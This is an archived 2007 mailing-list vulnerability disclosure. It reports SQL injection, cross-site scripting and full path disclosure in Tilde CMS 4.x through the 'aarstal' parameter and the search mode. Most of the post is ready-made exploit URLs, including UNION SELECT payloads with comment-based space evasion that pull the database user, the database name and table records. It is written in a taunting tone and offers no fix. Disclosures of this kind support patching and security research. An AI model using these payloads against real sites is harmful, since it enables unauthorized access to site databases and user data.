Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection |
|---|---|
| Date: | 26 Nov 2007 19:06:24 -0000 |
---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection
---------------------------------------------------------------
#By KiNgOfThEwOrLd
---------------------------------------------------------------
PoC
D'u need an explanation?!? i don't think so :P
---------------------------------------------------------------
SQL Injection
http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=%27
Little examples
Using user() and database() functions u can get some informations about the
database...as:
http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/*
Or u can get some recordes by the database like:
http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name]/**/from/**/[table_name]/*
D'u want the tables n' the rows? Find it yourself ;P
---------------------------------------------------------------
something else..
Xss Vulnerability
http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=[XSS]
---------------------------------------------------------------
Full Path Disclosure
http://[target]/[tilde_path]/index.php?search=%3C&mode=search&sider=on&tss=on&linier=on
---------------------------------------------------------------
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | DeluxeBB E-Mail Address Change Security Bypass, bugtraq |
|---|---|
| Next by Date: | SimpleGallery v0.1.3 (index.php) Cross-Site Scripting Vulnerability, sys-project |
| Previous by Thread: | DeluxeBB E-Mail Address Change Security Bypass, bugtraq |
| Next by Thread: | SimpleGallery v0.1.3 (index.php) Cross-Site Scripting Vulnerability, sys-project |
| Indexes: | [Date] [Thread] [Top] [All Lists] |